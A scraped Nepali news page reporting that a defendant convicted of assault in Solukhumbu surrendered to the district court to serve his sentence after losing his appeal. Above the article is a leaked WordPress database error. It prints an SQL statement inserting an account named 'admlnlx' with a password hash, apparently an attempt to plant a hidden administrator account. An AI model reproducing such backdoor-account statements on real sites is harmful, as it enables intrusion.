WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBI3FFCzNIiZ9021wZZNRNDG5Pi4MC.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 08:32:21', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, २६ बैशाख, सोलुखुम्बु । जिल्ला अदालत सोलुखुम्बुमा कैद भुक्तानका लागि एक प्रतिबादी आँफै उपस्थित भएका छन । माप्यदुधकोशी गाउँपलिका वडा नम्बर ६ वाकु बधुबरका शिरे बुढाथोकी मगर अदालतमा आफै उपस्थित भएका हुन ।
२०७३ सालमा कुटपिट मुद्दामा सजाए पाएका मगरले चित्त नबुझे पछि पुनराबेदन गरेको र पुनराबेदन अदालत औखलढुङगाले पनि जिल्ला अदालत सोलुखुम्बुको फैसलालाई सदर गरेपछि उनि आफै उपस्थीत भएको जिल्ला अदालत सोलुखुम्बुले जनाएको छ ।
उनलाई जिल्ला अदालत सोलुखुम्बुले २०७३ साल जेष्ठ १० गते ६ महिना कैद र २ हजार जरीवाना तोकेको थियो । त्यस पछि पुनराबेदन गएका मगरलाई पुनराबेदन अदालतको २०७५ साल फागुन ३० गते फैसलामा जिल्ला अदालतको फैसलालाई सदर गरेको थियो । अहिले प्रतिबादी मगरलाई जिल्ला काराकार चलान गरिएको छ ।
प्रतिबादी मगरले माप्य दुधकोशी गाउँपालिका ६ साविक वाकु ८ बस्ने गोपाल रेग्मि मगरलाई २०७३ सालको बैशाख महिनामा कुटपिट गरेको आरोपमा मुद्दा दायर गरिएको जिल्ला अदालत सोलुखुम्बुले जनाएको छ ।